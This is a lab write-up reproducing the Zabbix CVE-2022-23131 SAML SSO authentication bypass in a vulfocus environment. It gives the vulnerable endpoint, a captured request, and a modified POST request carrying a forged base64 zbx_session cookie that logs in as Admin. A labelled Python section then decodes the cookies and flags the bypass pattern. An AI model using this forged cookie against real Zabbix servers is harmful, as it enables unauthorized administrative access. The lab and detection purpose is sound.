vulfocus/zabbix-CVE-2022-23131 vulnerability reproduction

Start the environment

Access address

http://192.168.112.192:27986/

Find the backend (login) address

http://192.168.112.192:27986/zabbix/index.php

Vulnerable address

http://192.168.112.192:27986/zabbix/index_sso.php

Capture the request with Burp Suite (bp)

GET /zabbix/index_sso.php HTTP/1.1
Host: 192.168.112.192:27986
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiMGI2NThiZmQ5NTZhNWVmNGE3MjY0OTExYTJkNDlmNDYiLCJzZXJ2ZXJDaGVja1Jlc3VsdCI6dHJ1ZSwic2VydmVyQ2hlY2tUaW1lIjoxNjUyOTQxNzQwLCJzaWduIjoiMmUzZGY5MDllMmI0NGU1Njk4YjhmOTBjNzZiNmJiMzRmNzE4NmRlMDUyOGJkNTdhZjk4Y2QxZTA2MjRiNzFhOCJ9
Connection: close

Modify the request

POST /zabbix/index_sso.php HTTP/1.1
Host: 192.168.112.192:27986
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The main changes are the request method (GET to POST) and the cookie.

Change the cookie to

zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
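As an added defender-side example (not part of the original writeup or of Zabbix's code), the Python below decodes the two zbx_session cookies captured above, flags the CVE-2022-23131 pattern (saml_data present while sessionid and sign are empty), and shows what a keyed signature check on the cookie looks like. The HMAC-SHA256 scheme, its canonical form and the key are illustrative assumptions, not Zabbix's actual signing implementation.

```python
import base64
import hashlib
import hmac
import json

# Cookie values copied from the two captured requests above (real session vs. forged one).
LEGIT_COOKIE = ("eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoi"
                "MGI2NThiZmQ5NTZhNWVmNGE3MjY0OTExYTJkNDlmNDYiLCJzZXJ2ZXJDaGVja1Jlc3VsdCI6dHJ1ZSwi"
                "c2VydmVyQ2hlY2tUaW1lIjoxNjUyOTQxNzQwLCJzaWduIjoi"
                "MmUzZGY5MDllMmI0NGU1Njk4YjhmOTBjNzZiNmJiMzRmNzE4NmRlMDUyOGJkNTdhZjk4Y2QxZTA2MjRiNzFhOCJ9")
FORGED_COOKIE = "eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"


def decode_zbx_session(cookie: str) -> dict:
    """zbx_session is base64-encoded JSON; re-add '=' padding in case a proxy stripped it."""
    padded = cookie + "=" * (-len(cookie) % 4)
    return json.loads(base64.b64decode(padded))


def bypass_indicators(cookie: str) -> list:
    """Detection check for the CVE-2022-23131 pattern: SAML data asserting a user
    while the fields that tie the cookie to a real, signed session are empty."""
    data = decode_zbx_session(cookie)
    findings = []
    if "saml_data" in data:
        if not data.get("sessionid"):
            findings.append("saml_data present but sessionid is empty")
        if not data.get("sign"):
            findings.append("saml_data present but sign is empty or missing")
    return findings


def _canonical(data: dict) -> bytes:
    """Bytes that get signed: every field except 'sign', in a stable key order (assumed scheme)."""
    body = {k: v for k, v in data.items() if k != "sign"}
    return json.dumps(body, sort_keys=True, separators=(",", ":")).encode()


def make_signed_cookie(data: dict, key: bytes) -> str:
    """ASSUMPTION: illustrative HMAC-SHA256 signing, not Zabbix's own scheme."""
    signed = dict(data, sign=hmac.new(key, _canonical(data), hashlib.sha256).hexdigest())
    return base64.b64encode(json.dumps(signed, separators=(",", ":")).encode()).decode()


def is_valid_session(cookie: str, key: bytes) -> bool:
    """Server-side rule: an empty sign, or a sign that does not match the keyed hash
    of the cookie's own contents, means saml_data must not be trusted at all."""
    data = decode_zbx_session(cookie)
    sign = data.get("sign") or ""
    expected = hmac.new(key, _canonical(data), hashlib.sha256).hexdigest()
    return bool(sign) and hmac.compare_digest(sign.encode(), expected.encode())
```

Run over a web-server or proxy log, `bypass_indicators` flags the forged cookie before any signature check is needed, while `is_valid_session` shows the check that must precede using saml_data.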

posted @ 2022-05-20 17:45  流浪的情郎  reads(245)  comments(0)